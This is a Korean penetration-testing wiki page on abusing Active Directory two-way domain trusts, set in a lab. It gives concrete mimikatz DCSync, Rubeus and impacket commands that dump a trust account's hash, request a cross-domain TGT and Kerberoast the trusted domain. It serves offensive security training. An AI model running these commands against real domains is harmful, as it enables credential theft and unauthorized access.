펜테스팅 위키
  • Welcome
    • Home
  • 정보 수집
    • OSINT
      • Sub Domain
      • Google Hacking
      • Github
      • IP Address
      • Employees
    • 내부망
      • RID Cycling
      • Password Spraying
      • Password Must Change
      • Extension
        • xlsx/ods
        • pfx
        • vhd
        • pst
        • vbs
        • hc
      • Protocol
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 23 - Telnet
        • 53 - DNS
        • 80/443 - HTTP
        • 88 - Kerberos
        • 111 - RPC
        • 135 - msrpc
        • 139/445 - SMB
        • 389/636 - LDAP
        • 1433 - MSSQL
        • 5985/5986 - wsman
  • 초기 침투
    • CVEs
      • CVE-2025-31486
    • Phishing
      • Command File
      • EXE + LNK
      • wax
      • Microsoft Word
    • Web
      • Quary Language
        • SQL
        • GraphQL
      • File Upload
      • File Download
      • XSS
      • SSRF
      • CSRF
      • Open Redirect
      • SOP / CORS
    • ZIP Slip
  • 지속성
    • Active Directory
      • Golden Tickets
      • Diamond Tickets
      • DC Shadow
      • RID Hijacking
      • Certificate
    • Local
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM
      • WMI Event Subscription
      • SSH Key Injection
      • DLL Hijacking
      • DLL SideLoading
      • Create Account
  • 권한 상승
    • Active Directory
      • DACL
        • ReadGMSAPassword
        • ReadLAPSPassword
        • ForceChangePassword
        • AddSelf
        • GenericAll
        • Inherited GenericAll
        • WriteOwner
        • GenericWrite
        • WriteProperty
        • WriteSPN
        • AddMembers
        • WriteGPO
        • AddAllowedToAct
        • AllExtendedRights
        • Restore-ADObject
      • AD CS
        • Abuse Permissions
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC5
        • ESC6
        • ESC7
        • ESC8
        • ESC9
        • ESC10
        • ESC11
        • CVE-2022-26923
        • Non-PKINIT
      • MS14-068
      • Server Operators
      • DnsAdmins
      • noPac
      • Silver Tickets
      • KrbRelayUp
      • GPO
    • Windows
      • SeImpersonatePrivilege
      • Unquoted Service Path
      • Weak Service Permissions
      • Weak Service Binary Permissions
      • UAC Bypass
      • Always Install Elevated
      • Autoruns
      • Credential Manager
      • Local Service Account
  • 민감정보 탈취
    • Active Directory
      • Kerberoasting
      • Timeroasting
      • Targeted Kerberoast
      • ASRep-Roasting
      • AS Requested Service Tickets
      • Unconstrained Delegation
      • Constrained Delegation
      • Alternate Service Name
      • Resource Based Constrained Delegation
      • Shadow Credentials
      • DCSync
      • LSASS
      • Backup Operators
      • SeEnableDelegationPrivilege
      • Domain Cached Credentials
      • Network Access Account Credentials
      • DPAPI Backup Key
    • Windows
      • Unattended File
      • DPAPI
      • Hard-coding Credentials
      • SeBackupPrivilege
  • 측면 이동
    • File Transfer
      • SCP
      • ZIP
      • ncat
      • Python
      • PowerShell
      • certutil
      • wget
      • SMB
      • Base64
      • FTP
      • WebDav
      • cURL
    • Pivoting
      • SOCKS
      • Proxifier
      • Remote Port Forwarding
    • NTLM Relay
    • WebDAV Relay
    • WinRM
    • PsExec
    • WMI
    • DCOM
    • RDP
    • Port Forwarding
    • Domain Trust Discovery
  • 사용자 가장
    • Pass the Hash
  • Pass the Ticket
  • Overpass the Hash
  • Token Impersonation
  • Make Token
  • Process Injection
  • Domain Trust
    • Active Directory Trusts
    • Two-way Domain Trust
    • One-way Domain Trust
  • ETC
    • CS
      • Active Directory
      • Kerberos
      • NTLM
      • PKINIT
      • Integrity
      • Registry
      • Delegation
      • OAuth 2.0
      • S4U
      • SCCM
      • SID History
      • TRUSTWORTHY
      • Link Server Passwords
      • SSL Pinning
    • Tools
      • Mindmap
      • Cobalt Strike
      • BloodHound
      • LDAP Search
      • Hydra
      • Hashcat
      • Ligolo-ng
    • Home Lab
Powered by GitBook
On this page
  • Abuse
  • Practice

Was this helpful?

Export as PDF
  1. Domain Trust

Two-way Domain Trust

PreviousActive Directory TrustsNextOne-way Domain Trust

Last updated 19 hours ago

Was this helpful?

양방향 신뢰 관계는 서로가 서로를 신뢰하여 리소스에 접근할 수 있고, 각 도메인 객체가 다른 도메인에 마이그레이션 가능한 관계를 의미합니다. 일반적인 신뢰 모델에서 A ↔ B ↔ C 사이의 양방향 신뢰 관계가 구축되어 있을 때 A는 자동으로 C와의 양방향 신뢰 관계를 갖습니다.

또한 도메인 간의 트러스트 관계 혹은 단일 루트 도메인은 포레스트 단위로 취급되는데, 이때 각 포레스트 간의 신뢰 관계 또한 도메인 간의 신뢰 관계와 유사하게 구성됩니다. 단, 포레스트 관계에서는 A ↔ B ↔ C 환경에서 A 포레스트와 C 포레스트가 양방향 신뢰 관계를 갖는 전이성이 없으며 별도로 설정해야 합니다.

포레스트 간의 신뢰 관계에서는 전이성이 없습니다.

Abuse

단방향 신뢰 관계에서 신뢰하는 도메인에는 신뢰받는 도메인의 NetBIOS 이름에 $ 기호를 붙인 특수 계정이 생성됩니다. 양방향 신뢰 관계는 단방향 신뢰 관계가 서로 구성된 개념이므로, 서로의 도메인에는 상대 도메인의 NetBIOS + $ 특수 계정이 생성되어 있고, 이 계정의 패스워드는 서로 동일하다는 것을 알 수 있습니다.

PENTEST.LOCAL과 CONTOSO.COM 도메인이 양방향 신뢰 관계라는 것을 알았을 때, PENTEST.LOCAL에서는 CONTOSO$ 계정에 대한 TGT를 발급함에 따라 CONTOSO.COM 리소스에 접근할 수 있습니다.

  1. PENTEST.LOCAL 계정에서 CONTOSO$ 계정의 NT 해시 덤프

  2. CONTOSO$ 계정은 CONTOSO.COM\PENTEST$ 계정과 동일한 패스워드를 공유함

  3. CONTOSO$ 패스워드를 이용하여 CONTOSO.COM\PENTEST$ TGT를 CONTOSO.COM에 요청

  4. 발급된 TGT를 이용하여 CONTOSO.COM 리소스 접근

# 특수 계정 해시 덤프
mimikatz # lsadump::dcsync /user:CONTOSO$

# 특수 계정 TGT 발급
.\Rubeus.exe asktgt /user:CONTOSO$ /domain:PENTEST.LOCAL /rc4:2b576acbe6bcfda7294d6bd18041b8fe

# 추가 공격 (Kerberoasting / AS Rep Roasting)
.\Rubeus.exe kerberoast /domain:CONTOSO.COM
.\Rubeus.exe asreproast /domain:CONTOSO.COM
# 특수 계정 해시 덤프
impacket-secretsdump <domain/user:pass@dc-ip> -just-dc-user <target>

# 특수 계정 TGT 발급
impacket-getTGT <domain/target> -hashes :<nt hash>

Practice

PENTEST.LOCAL과 CONTOSO.COM이 양방향 신뢰 관계인 환경에서, 공격자는 PENTEST.LOCAL 도메인을 장악한 상황을 가정합니다. DCSync를 통하여 CONTOSO$ 계정의 NT 해시를 가져옵니다.

CONTOSO$ 계정의 해시는 CONTOSO.COM\PENTEST$와 일치한다는 것을 알고 있기 때문에, 장악한 도메인의 DCSync를 이용하여 CONTOSO.COM 도메인 객체 TGT를 얻습니다. 티겟을 발급 후 환경 변수로 등록한 이후 저장된 티켓을 확인합니다.

CONTOSO.COM에서 유효한 TGT를 이용하여 리소스에 접근합니다. 가능한 공격 방법은 다양하지만, 실습에서는 간단한 커버로스팅을 시연합니다.

CONTOSO$ NT 해시 덤프
TGT 확인
CONTOSO.COM 도메인 커버로스팅
https://learn.microsoft.com/ko-kr/entra/identity/domain-services/concepts-forest-trust